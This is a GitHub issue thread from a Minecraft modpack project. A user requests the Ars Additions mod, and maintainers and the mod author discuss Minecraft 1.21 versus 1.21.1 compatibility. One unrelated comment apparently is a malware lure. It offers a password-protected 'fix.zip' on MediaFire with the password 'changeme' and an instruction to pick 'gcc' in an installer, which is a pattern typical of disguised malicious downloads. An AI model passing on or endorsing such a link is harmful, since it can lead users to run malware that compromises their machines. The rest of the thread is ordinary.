### ISSUE TITLE
Ars Additions

### ISSUE THREAD

**Issue by theboo** [EnigmaticaModpacks/Enigmatica10#98]
### URL

https://www.curseforge.com/minecraft/mc-mods/ars-additions/files/5663351

### Why would you like the mod added?

Lots of fun additions (ha!) to ars...

Including a couple fun structures like ruined warp portals (ars themed nether portal ruins) with fancy warp scrolls as loot to take adventurers to points of interest. 

warp index to use as a purpose built remote accessor for your lectern, has a stabilized version for cross dim

Datapackable structure find ritual, takes items and spits out a custom compass item that points to a specific structure 

ender sauce jar(ender tank but for sauce)

Wixie accessory to allow her to automate the enchanting apparatus

Codex entries that allow pack devs to give random glyphs as loot, t1 already included in basic dungeon loot, t2/t3 available for pack devs...

Lots more! Is in alpha now but all 1.21 bugs that have been reported have been fixed in latest, only really missing one structure(mansion sized ars dungeon with trap runes, wilden mobs, and other fun danger) which will be added back soon(had to be disabled temporarily due to change in how the runes work)

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NielsPilgaard** [comment]
I would've added it, but it's 1.21.1 only and I haven't made the jump yet :P

**Comment by Jarva** [comment]
I can release a version that work on 1.21, there's no functionality different so it's just editing the compatible versions

**Comment by NielsPilgaard** [comment]
That would be lovely, but it's fine if you don't, I'll just add it once I update to 1.21.1 :)

**Comment by Jarva** [comment]
I just checked, I actually built it for 1.21, so added the version as compatible on CF

**Comment by NielsPilgaard** [comment]
Thanks 👍
